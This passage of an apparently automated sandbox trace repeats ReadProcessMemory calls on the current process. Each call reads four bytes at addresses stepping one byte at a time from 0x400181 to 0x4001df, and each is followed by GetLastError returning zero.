lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.509] GetLastError () returned 0x0 [0079.509] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400181, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.509] GetLastError () returned 0x0 [0079.509] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400182, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.509] GetLastError () returned 0x0 [0079.509] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400183, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.509] GetLastError () returned 0x0 [0079.509] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400184, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.509] GetLastError () returned 0x0 [0079.509] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400185, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.509] GetLastError () returned 0x0 [0079.509] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400186, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.509] GetLastError () returned 0x0 [0079.509] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400187, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.509] GetLastError () returned 0x0 [0079.509] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400188, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.509] GetLastError () returned 0x0 [0079.509] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400189, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.509] GetLastError () returned 0x0 [0079.509] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40018a, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.509] GetLastError () returned 0x0 [0079.509] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40018b, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.510] GetLastError () returned 0x0 [0079.510] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40018c, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.510] GetLastError () returned 0x0 [0079.510] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40018d, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.510] GetLastError () returned 0x0 [0079.510] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40018e, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.510] GetLastError () returned 0x0 [0079.510] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40018f, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.510] GetLastError () returned 0x0 [0079.510] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400190, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.510] GetLastError () returned 0x0 [0079.510] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400191, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.510] GetLastError () returned 0x0 [0079.510] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400192, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.510] GetLastError () returned 0x0 [0079.510] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400193, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.510] GetLastError () returned 0x0 [0079.510] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400194, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.510] GetLastError () returned 0x0 [0079.510] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400195, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.510] GetLastError () returned 0x0 [0079.510] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400196, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.510] GetLastError () returned 0x0 [0079.510] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400197, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.510] GetLastError () returned 0x0 [0079.510] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400198, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.510] GetLastError () returned 0x0 [0079.510] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x400199, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.510] GetLastError () returned 0x0 [0079.510] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40019a, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.510] GetLastError () returned 0x0 [0079.510] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40019b, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.510] GetLastError () returned 0x0 [0079.510] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40019c, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.510] GetLastError () returned 0x0 [0079.510] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40019d, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.510] GetLastError () returned 0x0 [0079.510] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40019e, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.510] GetLastError () returned 0x0 [0079.510] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x40019f, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.510] GetLastError () returned 0x0 [0079.510] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001a0, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.510] GetLastError () returned 0x0 [0079.510] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001a1, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.511] GetLastError () returned 0x0 [0079.511] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001a2, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.511] GetLastError () returned 0x0 [0079.511] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001a3, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.511] GetLastError () returned 0x0 [0079.511] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001a4, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.511] GetLastError () returned 0x0 [0079.511] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001a5, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.511] GetLastError () returned 0x0 [0079.511] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001a6, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.511] GetLastError () returned 0x0 [0079.511] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001a7, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.511] GetLastError () returned 0x0 [0079.511] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001a8, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.511] GetLastError () returned 0x0 [0079.511] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001a9, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.511] GetLastError () returned 0x0 [0079.511] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001aa, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.511] GetLastError () returned 0x0 [0079.511] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ab, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.511] GetLastError () returned 0x0 [0079.511] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ac, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.511] GetLastError () returned 0x0 [0079.511] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ad, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.511] GetLastError () returned 0x0 [0079.511] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ae, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.511] GetLastError () returned 0x0 [0079.511] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001af, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.511] GetLastError () returned 0x0 [0079.511] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001b0, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.511] GetLastError () returned 0x0 [0079.511] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001b1, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.511] GetLastError () returned 0x0 [0079.511] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001b2, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.511] GetLastError () returned 0x0 [0079.511] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001b3, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.511] GetLastError () returned 0x0 [0079.511] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001b4, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.511] GetLastError () returned 0x0 [0079.511] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001b5, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.511] GetLastError () returned 0x0 [0079.511] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001b6, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.511] GetLastError () returned 0x0 [0079.511] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001b7, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.511] GetLastError () returned 0x0 [0079.511] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001b8, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.512] GetLastError () returned 0x0 [0079.512] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001b9, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.512] GetLastError () returned 0x0 [0079.512] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ba, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.512] GetLastError () returned 0x0 [0079.512] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001bb, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.512] GetLastError () returned 0x0 [0079.512] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001bc, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.512] GetLastError () returned 0x0 [0079.512] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001bd, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.512] GetLastError () returned 0x0 [0079.512] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001be, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.512] GetLastError () returned 0x0 [0079.512] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001bf, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.512] GetLastError () returned 0x0 [0079.512] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001c0, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.512] GetLastError () returned 0x0 [0079.512] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001c1, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.512] GetLastError () returned 0x0 [0079.512] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001c2, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.512] GetLastError () returned 0x0 [0079.512] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001c3, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.512] GetLastError () returned 0x0 [0079.512] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001c4, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.512] GetLastError () returned 0x0 [0079.512] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001c5, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.512] GetLastError () returned 0x0 [0079.512] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001c6, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.512] GetLastError () returned 0x0 [0079.512] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001c7, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.512] GetLastError () returned 0x0 [0079.512] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001c8, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.512] GetLastError () returned 0x0 [0079.512] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001c9, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.512] GetLastError () returned 0x0 [0079.512] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ca, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.512] GetLastError () returned 0x0 [0079.512] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001cb, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.512] GetLastError () returned 0x0 [0079.512] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001cc, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.512] GetLastError () returned 0x0 [0079.512] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001cd, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.512] GetLastError () returned 0x0 [0079.512] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001ce, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.512] GetLastError () returned 0x0 [0079.512] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001cf, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.513] GetLastError () returned 0x0 [0079.513] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001d0, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.513] GetLastError () returned 0x0 [0079.513] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001d1, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.513] GetLastError () returned 0x0 [0079.513] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001d2, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.513] GetLastError () returned 0x0 [0079.513] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001d3, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.513] GetLastError () returned 0x0 [0079.513] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001d4, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.513] GetLastError () returned 0x0 [0079.513] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001d5, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.513] GetLastError () returned 0x0 [0079.513] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001d6, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.513] GetLastError () returned 0x0 [0079.513] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001d7, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.513] GetLastError () returned 0x0 [0079.513] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001d8, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.513] GetLastError () returned 0x0 [0079.513] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001d9, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.513] GetLastError () returned 0x0 [0079.513] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001da, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.513] GetLastError () returned 0x0 [0079.513] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001db, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.513] GetLastError () returned 0x0 [0079.513] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001dc, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.513] GetLastError () returned 0x0 [0079.513] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001dd, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.513] GetLastError () returned 0x0 [0079.513] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001de, lpBuffer=0x18f6b4, nSize=0x4, lpNumberOfBytesRead=0x18f6a4 | out: lpBuffer=0x18f6b4*, lpNumberOfBytesRead=0x18f6a4*=0x4) returned 1 [0079.513] GetLastError () returned 0x0 [0079.513] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x4001df, 